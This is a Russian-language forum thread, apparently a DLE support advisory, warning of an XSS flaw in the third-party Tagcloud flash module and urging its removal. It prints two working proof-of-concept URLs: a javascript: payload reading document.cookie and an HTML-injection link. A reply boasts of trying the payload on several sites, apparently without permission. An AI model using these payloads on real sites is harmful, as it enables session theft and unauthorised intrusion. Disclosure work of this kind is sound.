Перейти к публикации

Уязвимость в стороннем модуле Tagcloud


Рекомендованные сообщения

Сегодня пришла информация о наличии уязвимости в стороннем модуле Tagcloud (вывод трехмерного облака тегов), т.к. это сторонний модуль и не входит в состав DLE, мы не публикуем исправления для него, а лишь настоятельно рекомендуем убрать с сайта этот сторонний модуль, если он у вас стоит

Данная уязвимость идентична XSS уязвимости в 3D Cloud для Joomla (http://websecurity.com.ua/3883/). Про миллионы флешек tagcloud.swf уязвимых к XSS атакам я упоминал в своей статье XSS уязвимости в 34 миллионах флеш файлах (http://websecurity.com.ua/3842/).

XSS:

http://site/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код исполнится при клике. Это Strictly social XSS.

Также можно провести HTML Injection атаку, в том числе на те флешки, где запрещены (в флешках или через WAF) javascript и vbscript URI в параметре tagcloud.

HTML Injection:

http://site/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уязвимы все версии плагина Tagcloud.

Ссылка на сообщение
Поделиться на других сайтах

Ого реально работает! Только-что проверил на нескольких сайтах :blink::o

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...